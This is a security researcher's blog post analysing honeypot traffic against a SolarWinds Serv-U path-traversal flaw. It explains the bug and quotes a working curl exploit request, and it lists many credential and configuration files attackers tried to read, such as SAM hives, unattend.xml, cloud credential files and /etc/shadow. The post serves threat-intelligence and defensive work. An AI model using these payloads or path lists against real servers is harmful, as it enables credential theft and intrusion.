On June 5, 2024, SolarWinds released an advisory regarding a path-traversal vulnerability in their “secure” file-transfer product, Serv-U. I wrote about it here back in mid-June when it was fairly recently released. So here we are, three months later - you might be wondering why we’re still talking about this!
When the vulnerability was new, I put a lot of work into crafting a very realistic honeypot that not only looks like the product, it also fakes out the filesystem to make it actually look vulnerable - so vulnerable that you can use the actual exploit to pull a wide range of realistic-looking files! Since the vulnerability came out, I’ve kept a few copies of the honeypot online, and to this day it continues to see an ongoing buzz of traffic.
Why write this now?
Well, looking at my notes, I started pulling data to write this blog on July 8, July 31, and again today (September 23, 2024, as I start writing this). This time I actually got everything together, and it’s finally time to see what we can learn! Looking at the data, it seems like the perfect time, because it’s been about a month since we’ve seen a meaningful change in the exploits.
I’ve gone on record in past publications saying that I’m deeply unconvinced whether or not meaningful widespread exploitation will occur on this type of vulnerability. So an attacker can read an arbitrary file - so what? While I see value in targeted attacks, what’s the point of scanning the entire internet for a specific file?
Let’s see if I can convince myself as I dive into the data - I can’t wait to find out!
The vulnerability
I went over the vulnerability in more detail in my previous write-up, but the simple version is:
- SolarWinds Serv-U will return a file when it receives a request with the arguments
?InternalDir=<dir>&InternalFile=<filename>
- When it receives such a request, it attempts to prevent directory traversal by ensuring that the directory does not contain
../
(on Linux), or..\
(on Windows) - Before actually serving the file, it converts slashes to the correct direction (so on Windows,
/
becomes\
, and on Linux\
becomes/
)
Together, that means that the software verifies that the directory doesn’t contain path-traversal characters appropriate to the operating system - then adds them!
That cool part about this is that we can distinguish payloads destined for Windows vs Linux by looking for slashes that go in the wrong direction.
The data
On September 23, 2024, I exported all traffic containing InternalDir=
from our database, trimmed it down to just the date and the URL, and called it original.txt. It’s otherwise entirely unprocessed, so if you can use it to draw your own conclusions, that’s awesome! Be sure to tell me about them!
That data has a lot of problems, though, some of which are caused by the HTTP protocol (specifically, URL encoding) and some of which are caused by mistakes by the attackers - we’ll get into that more (or you can just grab the cleaned version and skip ahead.
I should also note that this isn’t the same dataset from the previous blog - this is all new data!
URL encoding
URL encoding is a common way to encode URL arguments in an HTTP request. Characters in the URL are replaced with a %
sign and a hex representation of the character. %5C
can represent \
, for example, so you might see a request like:
InternalDir=%5C..%5C..%5C..%5Cetc&InternalFile=shadow
But that’s just another way to encode slashes; we can decode them with this Ruby (irb
) command, among many, many other ways:
irb(main):001:0> require 'cgi'
=> true
irb(main):002:0> puts CGI.unescape('InternalDir=%5C..%5C..%5C..%5Cetc&InternalFile=shadow') InternalDir=\..\..\..\etc&InternalFile=shadow
Sometimes we run into URL encodings for multiple characters (ie, UTF-8), such as:
InternalDir=\..\..\..\..\etc^&InternalFile=passwd%D1%8D
Which decodes to:
irb(main):003:0> puts CGI.unescape('InternalDir=\..\..\..\..\etc^&InternalFile=passwd%D1%8D') InternalDir=\..\..\..\..\etc^&InternalFile=passwdэ
Before we started analyzing the data, we decoded all the URLs. We also checked for other gotchas - that the arguments are in the correct order, there are no extraneous arguments, stuff like that - thankfully, most of the attackers were rather polite in most regards.
In that decoded URL, however, there are two errant characters: a caret (^
) and an э
. What’s going on with that?
Copying extra junk
The first question is, why is there a Cyrillic character (э) on the end of the request?
I can only imagine that, in the same way as we saw Chinese punctuation in my previous blog, we’re seeing a copy/paste error. Whoever configured the attack probably accidentally copied an extra character, which got included in an internet scan.
It’s interesting that at least one attacker last time was using a Chinese alphabet, and this time one is using the Cyrillic alphabet - it’s weak attribution, but seeing attackers that are using Chinese and Russian character sets is very interesting!
We removed all weird UTF-8 characters in the clean dataset (which, it turns out, was just that one this time).
Errant caret
The next question is, what’s with the caret (^
)? You’ll see it in this and other requests, such as:
InternalDir=\..\..\..\..\etc^&InternalFile=group
InternalDir=\..\..\..\..\etc^&InternalFile=group/root
InternalDir=\..\..\..\..\etc^&InternalFile=group
InternalDir=\..\..\..\..\etc^&InternalFile=hosts InternalDir=\..\..\..\..\etc^&InternalFile=group
I actually covered that one in my previous blog, but I find it funny and want to mention it again!
Basically, one the first analyses published about the vulnerability was from my old colleague Stephen Fewer, who for some reason uses Windows as his analysis machine (I try not to judge life choices!). On the Windows command line (cmd.exe
), the caret symbol is used as the escape character, so in his examples he uses it (correctly!) to escape the ampersand:
>curl -i -k --path-as-is https://192.168.86.43/?InternalDir=\..\..\..\..\etc^&InternalFile=passwd
If somebody were to take that payload (without understanding it) and try to run it against targets on the internet (without testing it), they’d end up with a broken payload that includes a caret.
In our dataset, we “fixed” those by removing the ^
from the requests.
Broken requests
Some of the hits are missing arguments altogether - we just removed those:
InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/
InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/
InternalDir=........etc InternalDir=\..\..\..\..\etc
We removed that from our dataset.
Those fixes together gives us original-clean.txt as our next step.
Normalization
Since data is (as always) messy, I “normalized” the data for easier comparisons. I dunno how scientific it is, but basically I…
- Combined the directory / filename into a single path (as opposed URL arguments)
- Determined whether it’s Linux or Windows (based on the direction of the path-traversal slashes), then, using that determination, I:
- Corrected all the slashes to what the OS expects
- Removed the path-traversal characters
- Added either a
c:\
(Windows) or/
(Linux) at the front
- Removed double slashes and other weirdness
That gives us a much nicer list to work from!
Analysis
Now, what can we learn from all this?
I analyzed this data in three different ways:
Let’s look at what each of them tells us!
Most common requests
I counted how many times we saw each request in the normalized list and sorted it by frequently, creating this list.
The three most common requests are at least somewhat telling:
135 /etc/passwd
102 c:\windows\win.ini 82 c:\programdata\rhinosoft\serv-u\serv-u-startuplog.txt
Because a) the first two are the most common files used in vulnerability checks, and b) all three are the files that the public proofs of concept used. So no surprise that they’re common - people frequently take a proof of concept and run it against the internet.
Something I find interesting is the position of the Linux payloads: /etc/passwd
is the #1 most common and /etc/shadow
is 15th most common, but the next Linux payload is /etc/resolv.conf
at 52nd place, followed by /etc/group
at 125th place. In fact, the only “real” payloads for Linux (ie, ones that might actually return something private) are /etc/shadow
and /root/.bash_history
(and maybe /var/log/auth.log
). That’s pretty much it! It seems like, while the most common scan looked for Linux systems, people ultimately weren’t actually trying to exploit Linux very much.
Going back to the list - the 4th most common file requested was c:\users\administrator\ntuser.dat
, which is another “probably always exists” file used by some scanners but not containing anything particularly private.
Starting at the 5th most common, the next few look pretty important:
34 c:\windows\panther\unattended.xml
32 c:\windows\sysprep\sysprep.xml
32 c:\windows\sysprep\sysprep.inf
31 c:\windows\sysprep.inf
31 c:\windows\panther\unattend\unattended.xml
27 c:\windows\system32\sysprep\unattend.xml
27 c:\windows\system32\sysprep\unattended.xml
27 c:\windows\panther\unattend.xml 27 c:\windows\panther\unattend\unattend.xml
Attackers were really going after unattended.xml
and sysprep.xml
(plus variations)! I looked into unattended.xml
a bit, and noticed that it can have passwords in it, unsurprisingly (there’s even a Metasploit post-exploitation module). Likewise, sysprep.xml
shows up on lists of files with plaintext credentials.
The next group of files (and the last I’ll look at in this section) are also Windows-focused:
10 c:\windows\system32\config\system.sav
10 c:\windows\system32\config\software.sav
10 c:\windows\system32\config\security.sav
10 c:\windows\system32\config\regback\system
10 c:\windows\system32\config\regback\sam
10 c:\windows\system32\config\default.sav
10 c:\windows\repair\system 10 c:\windows\repair\sam
These are all (or mostly all?) registry hives, including the Windows registry and the Windows password store - SAM
- the equivalent to /etc/shadow
. I don’t believe you can actually read that file, so I don’t expect that this actually worked for the attackers.
My conclusion with looking at the frequency of different requests is that the most common exploits attempts we saw were vulnerability scanners or people testing their proofs of concept, but that attackers performed a non-trivial amount of earnest exploitation - trying to access private passwords and other data. That sorta surprised me!
First time each request was observed
Next, I sorted the request by the datestamp, and only kept the earliest version of each request, thus getting a list of the first time each payload was observed
The very first requests seen are from June 24, 2024. There’s nothing really to read into that - that’s simply when I deployed the honeypots that detect this traffic.
For the first week or two, we saw mostly vulnerability scans.
Then, on July 3, somebody tried fetching a bunch of hopeful files that might contain logins - desktop/password.csv
and such. I doubt they found much, but I did enjoy seeing those hopeful requests:
2024-07-03T18:41:16+00:00 c:\users\administrator\desktop\logins.csv
2024-07-03T18:41:16+00:00 c:\users\administrator\desktop\password.csv
2024-07-03T18:41:17+00:00 c:\users\administrator\desktop\1.csv
2024-07-03T18:41:18+00:00 c:\users\administrator\desktop\logins.txt
2024-07-03T18:41:19+00:00 c:\users\administrator\desktop\password.txt 2024-07-03T18:41:20+00:00 c:\users\administrator\desktop\1.txt
On July 7, a huge surge of new requests came in - INI
files, http.conf
, MySQL and Postgres config/log/data files, the Windows registry files, the first attempts to fetch the unattended.xml
files, and a bunch more. Presumably somebody did a big wave of scanning with a new list that day:
2024-07-07T13:23:42+00:00 c:\documents and settings\administrator\ntuser.dat
2024-07-07T13:23:43+00:00 c:\apache\logs\access.log
2024-07-07T13:23:43+00:00 c:\apache\logs\error.log
2024-07-07T13:23:44+00:00 c:\apache\php\php.ini
2024-07-07T13:23:45+00:00 c:\boot.ini
[...]
2024-07-07T13:23:53+00:00 c:\php\php.ini
2024-07-07T13:23:54+00:00 c:\program files\apache group\apache2\conf\httpd.conf
2024-07-07T13:23:55+00:00 c:\program files\apache group\apache\conf\httpd.conf
[...]
2024-07-07T13:24:30+00:00 c:\windows\system32\config\security.sav
2024-07-07T13:24:31+00:00 c:\windows\system32\config\software.sav
2024-07-07T13:24:31+00:00 c:\windows\system32\config\system.sav
2024-07-07T13:24:32+00:00 c:\windows\system32\config\regback\default
2024-07-07T13:24:33+00:00 c:\windows\system32\config\regback\sam
2024-07-07T13:24:34+00:00 c:\windows\system32\config\regback\security
2024-07-07T13:24:35+00:00 c:\windows\system32\config\regback\system
2024-07-07T13:24:36+00:00 c:\windows\system32\config\regback\software
[...]
2024-07-07T13:25:16+00:00 c:\usr\local\pgsql\data\postgresql.conf
2024-07-07T13:25:17+00:00 c:\usr\local\pgsql\data\pg_hba.conf 2024-07-07T13:25:18+00:00 c:\usr\internet\pgsql\data\pg_hba.conf
Then, nothing new until July 20! On July 20, somebody searched for a bunch of Linux configuration files - /etc/ssh/sshd_config
and /etc/hostname
and such. I guess somebody was looking for vulnerable Linux hosts for a change?
2024-07-20T14:46:18+00:00 /etc/ssh/sshd_config
2024-07-20T14:46:36+00:00 /etc/shh/sshd_config
2024-07-20T14:48:08+00:00 /etc/hostname
2024-07-20T14:50:40+00:00 /var/log/auth.log
2024-07-20T14:53:09+00:00 /etc/netplan/
2024-07-20T14:53:32+00:00 /etc/id.so.preload
2024-07-20T14:53:58+00:00 /etc/group
2024-07-20T14:54:31+00:00 /etc/hosts 2024-07-20T15:03:50+00:00 /etc/group/root
Then, again, no activity until July 29, when somebody apparently fired up a broken tool of some sort that filled my log with invalid files, such as:
2024-07-29T15:16:41+00:00 c:\attend.inf\unattend.inf
2024-07-29T15:16:42+00:00 c:\m\sam
2024-07-29T15:16:43+00:00 c:\stem\system
2024-07-29T15:16:44+00:00 c:\edentials\credentials
2024-07-29T15:16:44+00:00 c:\edentials.db\credentials.db
2024-07-29T15:16:44+00:00 c:\gacy_credentials\legacy_credentials
2024-07-29T15:16:45+00:00 c:\cess_tokens.db\access_tokens.db
2024-07-29T15:16:45+00:00 c:\cesstokens.json\accesstokens.json 2024-07-29T15:16:45+00:00 c:\ureprofile.json\azureprofile.json
It kinda looks like they mistakenly used the same variable for the directory and the filename, but only kept part of the directory? I’m not really sure, but there are an awful lot of requests in that vein, all at around 15:10 - 15:20. A few minutes later, it looks like they fixed their tool (or maybe somebody else scanned concurrently?) and actually tried a few valid files:
2024-07-29T15:19:03+00:00 c:\sysprep.xml\sysprep.xml
2024-07-29T15:19:03+00:00 c:\sysprep.inf\sysprep.inf
2024-07-29T15:19:04+00:00 c:\unattended.xml\unattended.xml
2024-07-29T15:19:04+00:00 c:\unattend.xml\unattend.xml
2024-07-29T15:19:16+00:00 c:\windows\sysprep\sysprep.xml
2024-07-29T15:19:16+00:00 c:\windows\sysprep\sysprep.inf
2024-07-29T15:19:16+00:00 c:\windows\sysprep.inf
2024-07-29T15:19:49+00:00 c:\windows\panther\unattend.xml
2024-07-29T15:19:50+00:00 c:\windows\panther\unattend\unattend.xml
2024-07-29T15:19:51+00:00 c:\windows\system32\sysprep\unattend.xml 2024-07-29T15:19:51+00:00 c:\windows\system32\sysprep\unattended.xml
Interestingly, we see the first bunch of requests for cloud credentials (AWS, Azure, Gcloud) about 10 minutes later at 15:31:
2024-07-29T15:31:49+00:00 c:\users\administrator\.aws\credentials
2024-07-29T15:31:49+00:00 c:\users\administrator\appdata\roaming\gcloud\credentials.db
2024-07-29T15:31:50+00:00 c:\users\administrator\appdata\roaming\gcloud\legacy_credentials
2024-07-29T15:31:50+00:00 c:\users\administrator\appdata\roaming\gcloud\access_tokens.db
2024-07-29T15:31:50+00:00 c:\users\administrator\.azure\accesstokens.json [...]
After July 29, we see no new traffic for a couple weeks until August 12, when somebody tried to fetch just a single file (though a good one!):
2024-08-12T22:27:37+00:00 /root/.bash_history
Then, on August 30, we see one final new request:
2024-08-30T07:18:45+00:00 c:\programdata\rhinosoft\serv-u\serv-u.archive
And that’s it! No new payloads in nearly a month! I guess that’s a sign that no new tooling is being developed? Everybody is bored and moved on, or all possible targets are patched?
Looking at how the payload changed over the past three months, and when new paths were attempted, is fascinating to me - are these the same threat groups getting new ideas? Are these different groups who add this to their tooling at different periods? Are these malicious research projects from individuals? I have no idea!
Grouped by the “purpose” of the file
I saved “purpose” for the end because it’s more hand-wavey - basically, I went through every file, and (with Google and Perplexity trying, and failing, to help), I categorized the purposes of each file that attackers are trying to exfiltrate, which gives me this list. I’ll talk about a few files from each category and why I think they’re interesting!
Scanners
The heaviest group of files is what I called scanners - files that generally always exist, but don’t really have any interesting data, making them perfect for vulnerability checks:
135 /etc/passwd
102 c:\windows\win.ini
82 c:\programdata\rhinosoft\serv-u\serv-u-startuplog.txt
41 c:\users\administrator\ntuser.dat
16 c:\shares\serv-u.fileshares
6 /etc/resolv.conf
4 c:\winnt\win.ini
4 c:\windows\system32\drivers\etc\hosts
4 c:\user.dat\ntuser.dat
4 c:\documents and settings\administrator\ntuser.dat
4 c:\boot.ini
3 /etc/group [...]
Many of these were included in proofs of concept or are the go-to files that all of us hackers are familiar with. The third one - serv-u-startuplog.txt
- was listed in proofs of concept, because it’s included with the vulnerability application and makes a great target. Interesting that /etc/passwd
and c:\windows\win.ini
were preferred! I noted it earlier, but it’s also interesting to me that /etc/passwd
is the most frequently requested file, but “real” Linux attacks are reasonably uncommon.
We respond to those most of those requests with fake (but plausible!) files, which may have helped solicit further traffic that we saw.
Windows credential files
The second group is what I called windows credential files - files that are often present on Windows system and can contain private information. These are likely “real” attackers who are trying to get illicit access to systems:
34 c:\windows\panther\unattended.xml
32 c:\windows\sysprep\sysprep.xml
32 c:\windows\sysprep\sysprep.inf
[...]
10 c:\windows\system32\config\system.sav
10 c:\windows\system32\config\software.sav
10 c:\windows\system32\config\security.sav
10 c:\windows\system32\config\regback\system
10 c:\windows\system32\config\regback\sam
10 c:\windows\system32\config\default.sav
10 c:\windows\repair\system
10 c:\windows\repair\sam
[...]
4 c:\windows\system32\config\secevent.evt [...]
These include unattended.xml
and sysprep.xml
which, as we discussed earlier, contain passwords. Then we see the Windows Registry hives, the password (SAM) file, and event logs. These would all contain a massive amount of information for a would-be attacker, though many of those will likely fail due to permissions errors.
Web files
I named the next group web files, and they include configuration files for PHP, Apache, Nginx, and IIS, but entirely created for Windows targets:
12 c:\php\php.ini
8 c:\xampp\apache\bin\php.ini
8 c:\winnt\php.ini
8 c:\apache\php\php.ini
7 c:\windows\php.ini
6 c:\windows\inetpub\wwwroot\web.config
[...]
4 c:\netserver\bin\stable\apache\php.ini
4 c:\inetpub\wwwroot\global.asa
4 c:\inetpub\logs\logfiles\w3svc1\u_ex[yymmdd].log
4 c:\apache\logs\error.log
4 c:\apache\logs\access.log
3 c:\xampp\apache\logs\error.log
3 c:\windows\system32\inetsrv\config\schema\aspnet_schema.xml 3 c:\program files (x86)\xampp\apache\conf\httpd.conf
I separated these out because I’m unclear whether the folks hitting those files are looking for passwords or scanning for vulnerabilities. It’s unlikely that most of those would contain particularly private information, but they’re a great way to enumerate the application! I imagine these are more useful in a targeted attack, where somebody is trying to gather information about the application(s) running on the server.
I’m kinda wondering who would actually run these types of servers on the same host as Serv-U, but somebody probably does…
Databases
In the group I called databases, I included both database configurations and database data files. These also appear to be a mixture of enumeration (determining what the hosts are running) and data theft - if attackers can fetch the databases, they suddenly have your users, passwords, and whatever other data you store there! Here’s a selection of those requests:
8 c:\program files\mysql\mysql server 5.0\my.ini
8 c:\program files\mysql\mysql server 5.0\data\mysql.err
8 c:\program files\mysql\mysql server 5.0\data\mysql-bin.log
[...]
4 c:\var\postgresql\db\postgresql.conf
4 c:\var\lib\pgsql\data\postgresql.conf
4 c:\usr\local\pgsql\data\postgresql.conf
[...]
4 c:\program files\microsoft sql server\mssql.1\template data\master.mdf
4 c:\program files\microsoft sql server\mssql14.sqlexpress\template data\master.mdf
4 c:\program files\microsoft sql server\mssql13.sqlexpress\template data\master.mdf [...]
I appreciate that they’re once again thorough - they’re looking for MySQL, PostgreSQL, and SQL Server. Sorry, Oracle!
Once again, it makes me wonder who would be running databases on the same server as Serv-U.
Broken
This is my second-favourite category.. broken files! These include broken tooling (that messes up the directory), typos, and requests for directories as if they’re files (which I don’t believe works).. I probably missed some typos in files I’m not familiar with, but this is what I came up with:
6 c:\windows\inetpub\wwwroot\conntectionstrings.config
6 c:\stem\system
6 c:\m\sam
2 c:\ureprofile.json\azureprofile.json
2 c:\unattend.xml\unattend.xml
2 c:\sysprep.inf\sysprep.inf
2 c:\stem.sav\system.sav
2 c:\nsolehost_history\consolehost_history
2 c:\nntectionstrings.config\conntectionstrings.config
2 c:\gacy_credentials\legacy_credentials
2 c:\ftware.sav\software.sav
2 c:\fault.sav\default.sav
2 c:\edentials.db\credentials.db
2 c:\edentials\credentials
2 c:\curity.sav\security.sav
2 c:\cesstokens.json\accesstokens.json
2 c:\cess_tokens.db\access_tokens.db
2 c:\b.config\web.config
2 c:\attend.txt\unattend.txt
2 c:\attend.inf\unattend.inf
1 /var/backups
1 /var
1 /etc/shh/sshd_config
1 /etc/netplan/ 1 /etc/id.so.preload
My favourite is the shh
folder (don’t tell!) and id.so.preload
. The poor attacker who scanned the internet for /etc/id.so.preload
probably thought they were so clever! The ld.so.preload
file is present on all Linux systems and isn’t one that folks usually request, so it may have flown under the radar. But they used id
instead of ld
, so they almost certainly found nothing. Sad!
Interesting config files
I called the next group interesting config files, and it’s a bunch of different Cloud services (Azure, AWS, and Gcloud), as well as FileZilla:
6 c:\users\administrator\.azure\azureprofile.json
6 c:\users\administrator\.azure\accesstokens.json
6 c:\users\administrator\.aws\credentials
6 c:\users\administrator\appdata\roaming\gcloud\legacy_credentials
6 c:\users\administrator\appdata\roaming\gcloud\credentials.db
6 c:\users\administrator\appdata\roaming\gcloud\access_tokens.db
6 c:\users\administrator\appdata\microsoft\windows\powershell\psreadline\consolehost_history
4 c:\program files\filezilla server\filezilla server.xml 3 c:\program files (x86)\filezilla server\filezilla server.xml
It’s a bit weird that somebody would log into those services from a server, but you never know unless you try! I’m curious if they ever found anything.
Fun guesses
Okay, this one is my actual favourite - fun guesses. Somebody had the idea, “what if the administrator put a password file on their desktop?” and took some guesses. I don’t want the Bad Guys to actually get any data, but still I kinda hope they got something for this long shot:
8 c:\users\administrator\desktop\password.txt
8 c:\users\administrator\desktop\password.csv
8 c:\users\administrator\desktop\logins.txt
8 c:\users\administrator\desktop\logins.csv
8 c:\users\administrator\desktop\1.txt 8 c:\users\administrator\desktop\1.csv
Linux cred files
The last group, with a measly two entries, is Linux cred files:
13 /etc/shadow 2 /root/.bash_history
It’s interesting that /etc/passwd
is one of the most common guesses, but actual Linux exploitation is limited!
Conclusion
I’m not sure what the takeaway of this, besides “here’s some neat data!”
I guess my personal takeaway is: I’ve said, many times, that as a wide-scale attack the value of path-traversal attacks that let you read arbitrary files is questionable. In a targeted attack, you can probably read config files, application source code, databases, and all that fun stuff, and use that to target an organization. But is there value in scanning the entire internet?
Apparently, to many, the answer is yes - the creativity and persistence are actually rather impressive. I learned a lot! I wonder how many of these actually turned up data? I’ll probably never know.
Additionally, as a honeypot-creator, it also gives me a great list of files in which to stick honeytokens to help fool future attackers! :)